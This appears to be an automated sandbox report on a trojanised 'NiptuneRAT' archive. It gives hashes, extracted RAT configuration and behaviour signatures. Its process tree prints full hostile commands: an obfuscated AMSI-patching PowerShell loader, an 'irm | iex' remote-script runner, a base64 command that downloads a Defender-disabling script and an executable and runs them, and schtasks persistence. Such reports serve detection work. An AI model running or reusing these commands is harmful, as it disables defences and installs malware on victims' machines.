Analysis
-
max time kernel
207s -
max time network
518s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
-
submitted
17-03-2024 21:41
General
-
Target
NiptuneRAT-main.zip
-
Size
29.9MB
-
MD5
5602885050f75519abfe95d7501fc5b6
-
SHA1
54214aa8b1a4d5e2692594ba4dea973e740e2c55
-
SHA256
5b054b368eda8d148383e6a64d890b885d9a0b1898493e1008ffe1a531118b6b
-
SHA512
7077ede3acc4b774181ff0866eeb5eb2672cdf2409384b2d46b45f8e182f3fc91bb65788c25bacc8af473a3083cc6bbbd73f5d4646b6f0fe2fb3e850c5eab7b2
-
SSDEEP
786432:IcRNogA1jwkC0OGikNuziqXkY0Ut79NhU8odVsGmtfIC884StIC0Q5k:IcRNojskhms5G0UsVoNIzxC0Qi
Malware Config
Extracted
https://github.com/z77f/362973/raw/main/$77APCONSVC.EXE
https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat
Extracted
asyncrat
Default
127.0.0.1:1337
6רbץbZPtBΒ西勒NDME4f斯贼j
-
delay
1
-
install
true
-
install_file
$77.exe
-
install_folder
%AppData%
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
-
Contains code to disable Windows Defender 3 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
-
Detect Xworm Payload 1 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
Xworm
Xworm is a remote access trojan written in C#.
-
AgentTesla payload 1 IoCs
-
Async RAT payload 2 IoCs
-
Blocklisted process makes network request 4 IoCs
-
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 8 IoCs
-
Obfuscated with Agile.Net obfuscator 7 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Drops file in System32 directory 2 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Modifies data under HKEY_USERS 41 IoCs
-
Modifies registry class 59 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 14 IoCs
-
Suspicious use of FindShellTrayWindow 3 IoCs
-
Suspicious use of SendNotifyMessage 2 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 47 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{4f8ebf90-14cd-4bc7-b0be-fa6d0271da55}2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:FmDvVBkCFmNM{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$HTNynACjESgbSk,[Parameter(Position=1)][Type]$VUapLZDwuA)$svPFHJRydKw=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'f'+'l'+'e'+[Char](99)+'te'+'d'+''+[Char](68)+'e'+'l'+''+'e'+''+[Char](103)+''+'a'+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+'n'+''+'M'+''+[Char](101)+''+[Char](109)+'o'+[Char](114)+''+'y'+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+'u'+''+'l'+''+'e'+'',$False).DefineType(''+[Char](77)+'y'+[Char](68)+''+'e'+''+'l'+''+[Char](101)+''+[Char](103)+''+'a'+'t'+[Char](101)+'Typ'+[Char](101)+'','C'+[Char](108)+''+[Char](97)+''+'s'+''+'s'+''+','+''+'P'+''+[Char](117)+''+'b'+'l'+[Char](105)+'c'+[Char](44)+'Se'+[Char](97)+'l'+[Char](101)+'d'+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+[Char](67)+''+'l'+'as'+'s'+''+[Char](44)+''+'A'+''+[Char](117)+'toC'+[Char](108)+''+'a'+'ss',[MulticastDelegate]);$svPFHJRydKw.DefineConstructor(''+'R'+''+[Char](84)+''+[Char](83)+'pe'+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+','+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+'S'+''+[Char](105)+''+[Char](103)+''+','+''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$HTNynACjESgbSk).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+''+[Char](116)+'i'+'m'+''+[Char](101)+''+[Char](44)+''+'M'+''+'a'+''+'n'+''+[Char](97)+''+[Char](103)+''+'e'+''+[Char](100)+'');$svPFHJRydKw.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+'k'+'e',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+'i'+[Char](99)+','+[Char](72)+''+[Char](105)+''+'d'+'e'+[Char](66)+'ySig'+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+'S'+''+[Char](108)+''+[Char](111)+'t,'+[Char](86)+'i'+[Char](114)+''+[Char](116)+'u'+'a'+''+'l'+'',$VUapLZDwuA,$HTNynACjESgbSk).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+'t'+[Char](105)+''+[Char](109)+'e'+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+'a'+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $svPFHJRydKw.CreateType();}$rSoNzsfqtPNwC=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+'s'+[Char](116)+''+[Char](101)+'m'+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+'i'+''+[Char](99)+'r'+[Char](111)+'s'+[Char](111)+''+[Char](102)+''+'t'+''+[Char](46)+''+[Char](87)+'in3'+'2'+''+[Char](46)+''+'U'+''+'n'+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+'e'+''+[Char](78)+'at'+[Char](105)+''+[Char](118)+''+[Char](101)+''+'M'+''+[Char](101)+''+[Char](116)+''+[Char](104)+''+[Char](111)+'ds');$SEhCBgwbBYuhRD=$rSoNzsfqtPNwC.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](99)+''+'A'+''+[Char](100)+''+[Char](100)+''+[Char](114)+''+[Char](101)+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+'b'+'li'+[Char](99)+','+[Char](83)+'t'+[Char](97)+''+[Char](116)+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$OEZyTvETbOlFWBLYBao=FmDvVBkCFmNM @([String])([IntPtr]);$MmIGJVbffZIQsZzfFyzPEY=FmDvVBkCFmNM @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$iZqFqXMPixY=$rSoNzsfqtPNwC.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+'M'+''+[Char](111)+''+'d'+''+'u'+''+[Char](108)+''+[Char](101)+'Han'+[Char](100)+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+''+[Char](114)+''+'n'+''+[Char](101)+''+[Char](108)+'32'+[Char](46)+'d'+'l'+''+'l'+'')));$DIKOvfvTMYXWPH=$SEhCBgwbBYuhRD.Invoke($Null,@([Object]$iZqFqXMPixY,[Object]('L'+'o'+'a'+'d'+''+'L'+''+[Char](105)+''+'b'+''+[Char](114)+'a'+'r'+'y'+[Char](65)+'')));$DPSAFRPwolNENAHkq=$SEhCBgwbBYuhRD.Invoke($Null,@([Object]$iZqFqXMPixY,[Object]('V'+[Char](105)+''+[Char](114)+''+'t'+''+'u'+''+[Char](97)+'l'+[Char](80)+''+[Char](114)+'o'+'t'+''+[Char](101)+''+'c'+''+[Char](116)+'')));$MpOZCuT=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DIKOvfvTMYXWPH,$OEZyTvETbOlFWBLYBao).Invoke(''+'a'+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](46)+''+[Char](100)+'ll');$YwEVUxYEuFWntIEUg=$SEhCBgwbBYuhRD.Invoke($Null,@([Object]$MpOZCuT,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+'c'+'a'+[Char](110)+''+[Char](66)+''+[Char](117)+'f'+[Char](102)+''+'e'+'r')));$yBKdqcFeiQ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DPSAFRPwolNENAHkq,$MmIGJVbffZIQsZzfFyzPEY).Invoke($YwEVUxYEuFWntIEUg,[uint32]8,4,[ref]$yBKdqcFeiQ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$YwEVUxYEuFWntIEUg,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DPSAFRPwolNENAHkq,$MmIGJVbffZIQsZzfFyzPEY).Invoke($YwEVUxYEuFWntIEUg,[uint32]8,0x20,[ref]$yBKdqcFeiQ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'OF'+'T'+'WA'+'R'+''+[Char](69)+'').GetValue(''+[Char](36)+''+[Char](55)+''+[Char](55)+''+'s'+''+[Char](116)+'a'+[Char](103)+'er')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
-
C:\Users\Admin\AppData\Roaming\$77TCPSVCS.EXEC:\Users\Admin\AppData\Roaming\$77TCPSVCS.EXE2⤵
-
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Windows\Explorer.exeC:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\NiptuneRAT-main.zip1⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\NiptuneRAT-main\" -spe -an -ai#7zMap21379:88:7zEvent293501⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe"C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe"C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe"2⤵
- Executes dropped EXE
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneBinder.exe"C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneBinder.exe"2⤵
- Executes dropped EXE
-
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵
-
C:\Users\Admin\Desktop\$77NiptuneClient.exe"C:\Users\Admin\Desktop\$77NiptuneClient.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$77" /tr '"C:\Users\Admin\AppData\Roaming\$77.exe"' & exit2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "$77" /tr '"C:\Users\Admin\AppData\Roaming\$77.exe"'3⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpD3B1.tmp.bat""2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\timeout.exetimeout 33⤵
- Delays execution with timeout.exe
-
-
C:\Users\Admin\AppData\Roaming\$77.exe"C:\Users\Admin\AppData\Roaming\$77.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c powershell "irm rentry.co/System-Settings/raw | iex"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "irm rentry.co/System-Settings/raw | iex"3⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JABzAGUAdAB0AGkAbgBnAHMAIAA9ACAAJwB7ACIAVwBEACIAOgAgAGYAYQBsAHMAZQAsACAAIgBhAGQAbQBpAG4AcgB1AG4AIgA6ACAAZgBhAGwAcwBlAH0AJwAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsAJAByAGEAbgBkAG8AbQBTAHQAcgBpAG4AZwAgAD0AIAAiADUAWQBQAEQAdgBQAGkAUwBvAFYAIgA7AGkAZgAgACgAJABzAGUAdAB0AGkAbgBnAHMALgBXAEQAKQAgAHsAJABzAGUAdAB0AGkAbgBnAHMALgBhAGQAbQBpAG4AcgB1AG4AIAA9ACAAJAB0AHIAdQBlADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALwBuAGkAbgBoAHAAbgAxADMAMwA3AC8ARABpAHMAYQBiAGwAZQAtAFcAaQBuAGQAbwB3AHMALQBEAGUAZgBlAG4AZABlAHIALwBtAGEAaQBuAC8AcwBvAHUAcgBjAGUALgBiAGEAdAAnACwAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0AVwBhAGkAdAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AOwBpAGYAIAAoACQAcwBlAHQAdABpAG4AZwBzAC4AYQBkAG0AaQBuAHIAdQBuACkAIAB7ACQAdQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AZwBpAHQAaAB1AGIALgBjAG8AbQAvAHoANwA3AGYALwAzADYAMgA5ADcAMwAvAHIAYQB3AC8AbQBhAGkAbgAvACQANwA3AEEAUABDAE8ATgBTAFYAQwAuAEUAWABFACcAOwAkAG8AdQB0AHAAdQB0AFAAYQB0AGgAIAA9ACAAJABlAG4AdgA6AFQARQBNAFAAIAArACAAJwBcACcAIAArACAAJwAkADcANwBBAFAAQwBPAE4AUwBWAEMALgBFAFgARQAnADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAdQByAGwALAAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AZQBsAHMAZQAgAHsAJAB1AHIAbAAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AegA3ADcAZgAvADMANgAyADkANwAzAC8AcgBhAHcALwBtAGEAaQBuAC8AJAA3ADcAQQBQAEMATwBOAFMAVgBDAC4ARQBYAEUAJwA7ACQAbwB1AHQAcAB1AHQAUABhAHQAaAAgAD0AIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAnACQANwA3AEEAUABDAE8ATgBTAFYAQwAuAEUAWABFACcAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJAB1AHIAbAAsACAAJABvAHUAdABwAHUAdABQAGEAdABoACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABvAHUAdABwAHUAdABQAGEAdABoADsAfQA=4⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\$77APCONSVC.EXE"C:\Users\Admin\AppData\Local\Temp\$77APCONSVC.EXE"5⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\$77SYSTEM.exe"C:\Users\Admin\AppData\Local\Temp\$77SYSTEM.exe"6⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\$77TCPSVCS.EXE"C:\Users\Admin\AppData\Local\Temp\$77TCPSVCS.EXE"6⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77TCPSVCS" /tr "C:\Users\Admin\AppData\Roaming\$77TCPSVCS.EXE"7⤵
- Creates scheduled task(s)
-
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5f62a904508f640cf7a29c69cdda7ed8e
SHA179e4bd22e96aa94c783f5521b5b2a549c58ed24f
SHA2561c68a8d5fb2a3d57a9eaeb1e64cc457f3f4e268a54cbf8aeaf5084fd401e59bc
SHA5120a5bdaf832544123470af0204145dc38830dbbf0e8b6623b89bbaca5970e5c0506356e4ad9d9a589bd3394768ff949215c3fea2d2542da16ffb60708c0f2c544
-
Filesize
1KB
MD512b1823a0956e972f95e397d4ca5a91f
SHA11ad092456da4540400fd58788bc40a353b17e295
SHA2560096655234a74760fbeb882149ad2513be4c9782e1e8ca86968e61b9f88c5230
SHA5121bd8aa4179650510689ec523492c2327a61095c28266548d89512bc69b5b9b8416023e957a1ddfeefb51de2d403f525ee0535f850147b022568c44197fbcbcde
-
Filesize
807B
MD577d636e08fe9de62cf19ad656409ccde
SHA1827de958d0c46346c9c581be646b8c3a61fab648
SHA2564155b94bb3ef65ff1f15d7f337f2ada62d474ec5ba7557562618e5206e83a558
SHA51260712d620a884d897457f56d4ecc758c9a753c31f58fcb9d814af58dbc2e105435c9a73f837b4146e2e8edb7834b83f51dcecaaf39cd6f69be59d7bb5c28b839
-
Filesize
927B
MD567ae3b067855a1e16f01e16ee389c8f0
SHA13bef83c7922cda26497a45bbfe209e65b14234a0
SHA25607e9e4841eeace951264cf7b4cf5e8c6993fc923b851cb2360122fe7fec2ef0a
SHA512db73d3a4a9523db12264d1cf53e50d44589af8dc83bdbb041eff8977f6134666d1836014ebde472039036a13beabe6adee026712f385453ed654ae5ac504e699
-
Filesize
182KB
MD50ccb78c036b77af2a02939c10863d0fc
SHA177b58cc239c67abf271a7e68c10592a8a4d5bae1
SHA256555e0c40af959eb3c9be32197ebf39aea443fe672086e004cc0141296de67d7a
SHA51229f194f6118f558a31515538d758934d59959a9aeed1a2ae9e929b762166843a4433b10b0f5ded0698c141d36fc12ae54860ecbb8d36ba6ca2f92cb946f39a5c
-
Filesize
162KB
MD5152e3f07bbaf88fb8b097ba05a60df6e
SHA1c4638921bb140e7b6a722d7c4d88afa7ed4e55c8
SHA256a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc
SHA5122fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4
-
Filesize
39KB
MD539b931afd01be1f696c515a83b789445
SHA1790083c555276c9cca5bf7a9532fd99f79b80a90
SHA256e9db26ffe8f05c133a7c541ccd7eafa63b64806a84e4e5866fc735e5dc4ab93d
SHA5120961ea8fa2b23f2c2631db074a2271d37bec1844496796ec116c649245423b7e7da29b9a626c3c6406a65f9812550f09f089babee9fe805dcf311f6d7bda9592
-
Filesize
51B
MD53e79e497a1c8dff282c0e281a8ac4238
SHA1ca25ecd92033c4789f61dbbd0e782eac581a091c
SHA256edadb040867aacdc83bad794bdd55232320bb00ee4957b2217da614b26f158ea
SHA51298cff43d464e17f18f7252f80e3f1105f4f048f83895ddca2e72c0b77dbe406ec104939737841e71eeb005e4ac83f7b6fb3789b115e2b0d91d78662009fe33d6
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
147B
MD57352cc373f53964e85cee69d5e6a96d5
SHA1267c8a9098dd1d4842f052126ea14b1f7fc8c973
SHA2564397f51ac52f558c35fa9181fe7519cdef892bf26d99af375fff5f50cdaaa346
SHA51278826b32baa2c2c5eec0ffbe3f0c65dfc5cf9b270f4ce0174bda794a2c881858fd1ee0a7fba10af952ee3e14609095c2b24046dc6575de9dcddf513d4e4d2c73
-
Filesize
63KB
MD59a545e9134023055aa55309e62f77a80
SHA18f663c9816f8610676f4fc101cb6f31c21117d47
SHA25675bbbbeca7b8b6831e6bd91b7b7256c30a50de3369965f1866434a924f4c362e
SHA512d5d4dd237a03218d7c95f14160151e41adb89dd26192114efd9cc2b915e5fc006f2f4e2bf859c6cc1246f0584aa5f344d6b9525f3d31650719e8d4b66d838526
-
Filesize
5.1MB
MD5c52733885f1aa485683b9289c4b45519
SHA107c3faeb48670485bbefa9e3c35fc24da4f9411a
SHA256ca9dcd616882b3031c86f962b5cce07187a8a513d183b4f68d897d5687d45bd7
SHA5125fe1f30b412459cc5d71cd426c2bba9265e6c8f4ade5ddda052fe231ca4e036598c873c40441045abe591b8fcc6e850c2d691b179e44f02f3ce23d0effa4a5c2
-
Filesize
5.9MB
MD5a6bf33461f36b6cc60df311818e13f16
SHA1a18d8aec012db8d2b247b618087c860e134c7a57
SHA2567fb89d4f209ac6c6089783a2258a1b45d40686fb7624ad835263724e10477961
SHA5127faad74edc9282f3410fd3edcc8bedd4cba28fbb768b5c24cafa761503c7408b394296e905739f0105b76cde4fa24512cb2ea5610f4637a25de19f1792766ac0
-
Filesize
517B
MD5465c8716dc52edeaf09f0c61fc988934
SHA19cab6cec5f46d7528323fa2ad7aa2fc1a72d689b
SHA2561c6051caeecdd3eeb78cad1b1efa60e56be4193d76f5718c73b8fdfcd61784c5
SHA5120b386615940f254d6a7dd5650fc7da6544beab97d821bab8fe915dcc257729919142bbd6680b06a19f57c8c79c2c04368413fc31a7efef8e9248209f81c1cf3c
-
Filesize
78KB
MD5e4ebcf76ff80ef398d3ab77d577f4c08
SHA1cb9e6b30a63d50ae87610f6855b64abfb25691d2
SHA2569661b1abc9a3e95e591c49c3838a64a066a2ff3c6de08d8aa7b541c4a75cd8e5
SHA5128f37cedd987dd14181fdfa861b8a95271868dac21aa9df80bd6daa831ae20f4b4965c8be3e36f32aa220bd37ded11a7568ae237c9c9641bb4fc087f6fe104b01
-
Filesize
1.6MB
MD586cbe0f36426982c534746743f4a4dfe
SHA104dd3bf828b36ae75bfda0edc67693b59801e9b5
SHA256972261dfbdd76a5b99d2922a018c5c809ddb195c4f44312bb1da496c9c28df44
SHA5121cd164585caa0c5f64e567d24f9e4f9c4a4f79fb1e8da83ef8a635d6ad5e2f6ebcf2c813371b4cd53ea94e0d36f8a04fa2b2acf3f35570ff57450d6503fc31a4
-
Filesize
540KB
MD58105f5149e1fea72e27f0a1455d956bc
SHA16722d54df38b89284c3375efda3985155e6f5b8e
SHA2569b73be7a27b5aa8cabf10c79a6e515db6b59962cad3945dada2eff57bb56bfdf
SHA5124f1aaa81263bb17aa7b495cab056fd9b18058247df874866bd9cb6247f180989a0d549ce0b4595c7a636e4d6279e92004c4f159c30e8b381a1a51b9d54a84d10
-
Filesize
170KB
MD564a3d908b8a5feff2bccfc67f3a67dbd
SHA1a17d7e5fa57c99a067cac459cb507b625dac254e
SHA2566ea1ae7ab496666c0117fc20e704bfb6104b13cfb0408073a09689f863fa64b1
SHA51266374d720230799bea6ac6cfe3faadc37fd775a49d40c04facae1caf1ec658956bbda54ba75287d7128b19b97971bd933a64469da8e0884225c5a8d8b9423ccc
-
Filesize
170KB
MD50d41ccfaa8e7ef96248b8270d1a44d08
SHA16ee22bdb91d3a18e0b45b6590eb69bc9a0b02326
SHA2560ea38d0d964815e2b84748a78bd5a829ae01586478e5f17b976f1ae763c8dec3
SHA512a0f236f6dbeb1763fb1c198616de65b907a3a5edf7ed9435c2ad0b5826d84e9d2f25e96aba4e8b681ef495612cf0e04e929427a92d332164ace89e797bcb0e0e
-
Filesize
177KB
MD597b8bec4c47286e333cc2bedacf7338e
SHA1764bbd0307924b71ca89538b42996208d10c9b91
SHA256060d467cbeb0a58696287c052f3dd9b3597331b1c812e3e2882d6c232f8511de
SHA512a40970622a594533349e75fc2022314ba21f05fc82709d6eaba82f4a2bc343c960029ad2825cfc034ce82622722127d149993bff88982f02d6dd6b5b1fb60fbf
-
Filesize
2.0MB
MD5ab9b9dac5c176d3f525400aa7b58a078
SHA1c7b22490b94d46ed0287c4b6ece08e96e7103516
SHA2566d9da9ac899fdac6a9436922be389ef3bd124f4657fea6332c2ccd3fc33613d4
SHA512649032f0046778fa63e7878ade222de7a061162b6da4670970ace517d2c2212f80dff2fd5a5f2d9c25324a89c5af0927022c1ec24f726da92a669cd232b8ec16
-
Filesize
832KB
MD589974f21c462ad66165c03cc05a9b8a7
SHA1868b45d89fced9bf5cdc3e86e8eeb0698262deb4
SHA2569f61591699d7d9e3336bbe924e7826c1e8bedb7227045705d50eec264b1202ec
SHA5127348faa61700741733da0b80fdb824366a7cb7d841c24d78d54971ba1d0fbe899f257f0c68792db5c1e05ca3afb4e6fbd251f8d369c903e227e9b7eba4f861b3
-
Filesize
160B
